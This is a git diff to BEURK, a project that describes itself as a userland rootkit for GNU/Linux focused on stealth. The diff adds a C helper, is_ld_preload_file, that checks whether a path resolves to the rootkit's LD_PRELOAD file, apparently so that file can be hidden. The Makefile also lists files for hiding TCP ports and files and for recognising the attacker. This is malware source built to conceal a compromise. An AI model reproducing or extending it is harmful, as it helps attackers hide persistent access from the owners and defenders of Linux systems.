diff --git a/Makefile b/Makefile index 06e0374..9225bd2 100644 --- a/Makefile +++ b/Makefile @@ -33,6 +33,7 @@ SOURCES = src/init.c \ src/config.c \ src/debug.c \ src/is_hidden_file.c \ + src/is_ld_preload_file.c \ src/is_attacker.c \ src/is_procnet.c \ src/hide_tcp_ports.c \ diff --git a/src/is_ld_preload_file.c b/src/is_ld_preload_file.c new file mode 100644 index 0000000..1a71577 --- /dev/null +++ b/src/is_ld_preload_file.c @@ -0,0 +1,42 @@ +/* + * BEURK is an userland rootkit for GNU/Linux, focused around stealth. + * Copyright (C) 2015 unix-thrust + * + * This file is part of BEURK. + * + * BEURK is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * BEURK is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with BEURK. If not, see . + */ + +#include /* PATH_MAX */ +#include /* realpath(), free()*/ +#include /* strcmp() */ +#include "beurk.h" /* prototype */ +#include "config.h" /* FILE, MAX_LEN, MAGIC_STRING, LIBRARY_NAME, ... */ +#include "debug.h" /* DEBUG() */ + + +int is_ld_preload_file(const char *file) { + init(); + DEBUG(D_INFO, "called is_ld_preload_file()"); + + char *path; + int ret; + + path = realpath(file, NULL); + if (path == NULL) + return 0; + ret = !strcmp(path, LD_PRELOAD); + free(path); + return ret; +}